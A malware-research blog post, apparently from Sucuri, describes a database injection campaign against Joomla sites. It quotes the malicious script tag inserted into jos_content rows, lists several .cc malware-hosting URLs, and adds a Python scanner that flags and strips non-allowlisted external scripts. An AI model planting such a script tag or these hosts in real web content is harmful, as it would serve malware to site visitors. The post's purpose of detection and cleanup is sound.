Database Injection on Joomla Websites – yourstatscounter dot cz dot cc

It seems that a good number of Joomla sites are being infected with malware from the infamous “.cc” domains. All of the hacked sites have the malicious code injected directly into their databases (SQL injection) via an unknown source (probably a vulnerable extension, but we are still researching the entry point).

This is what is being added to the infected sites (at the top of every post in the jos_content table):

<script type="text/javascript" src="http://yourstatscounter.co.cc/statscounter307.js"></script>

There are many other domains being used in this attack, including:

http://faststatscounter.co.cc/statscounter01935.js

http://yourstatscounter.cz.cc/statscounter301.js

http://yourstatscounter.co.cc/statscounter307.js

http://easystatscounter.co.cc/statscounter12.js

http://supergoogleanalytics.co.cc/

Note that these are different from the Lizamoon SQL injection of a few days ago. Lizamoon was targeting IIS/ASP.NET sites, while this one seems to target only Joomla sites.
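
To check exported jos_content rows for this kind of injection, the added example below (not Sucuri's code) flags external script tags whose host is not on an allowlist and strips only those. The introtext/fulltext column names, the example.org allowlist entry and the sample rows are assumptions made for the illustration.

```python
import re
from urllib.parse import urlparse

# External <script src=...></script> element, the shape of the injection quoted in the post.
SCRIPT_RE = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>\s*</script>', re.IGNORECASE)

def is_suspicious(src, allowed_hosts):
    """True when src points at a host that is not allowlisted (or a subdomain of one)."""
    host = (urlparse(src).hostname or "").lower()
    if not host:
        return False  # relative URL: the script is served by the site itself
    return not any(host == a or host.endswith("." + a) for a in allowed_hosts)

def scan_rows(rows, allowed_hosts=()):
    """rows: (id, introtext, fulltext) tuples. Returns [(id, column, script src)]."""
    hits = []
    for row_id, introtext, fulltext in rows:
        for column, text in (("introtext", introtext), ("fulltext", fulltext)):
            for m in SCRIPT_RE.finditer(text or ""):
                if is_suspicious(m.group(1), allowed_hosts):
                    hits.append((row_id, column, m.group(1)))
    return hits

def strip_scripts(html, allowed_hosts=()):
    """Remove only the script elements flagged by is_suspicious; keep the rest."""
    return SCRIPT_RE.sub(
        lambda m: "" if is_suspicious(m.group(1), allowed_hosts) else m.group(0),
        html or "")

# Constructed sample rows; the injected tag is the one quoted in the post.
INJECTED = ('<script type="text/javascript" '
            'src="http://yourstatscounter.co.cc/statscounter307.js"></script>')
SAMPLE_ROWS = [
    (1, INJECTED + "<p>Welcome</p>", ""),
    (2, "<p>Clean</p>", '<script src="/media/system/js/caption.js"></script>'),
    (3, '<script src="https://cdn.example.org/lib.js"></script><p>x</p>',
        INJECTED + "<p>More</p>"),
]

if __name__ == "__main__":
    for row_id, column, src in scan_rows(SAMPLE_ROWS, allowed_hosts=("example.org",)):
        print(f"row {row_id} {column}: {src}")
```

Review the flagged rows before writing cleaned content back, and take a database backup first.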

If you are afraid your site might be hacked, check it using our malware scanner. If you need help cleaning it up, let us know.

About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.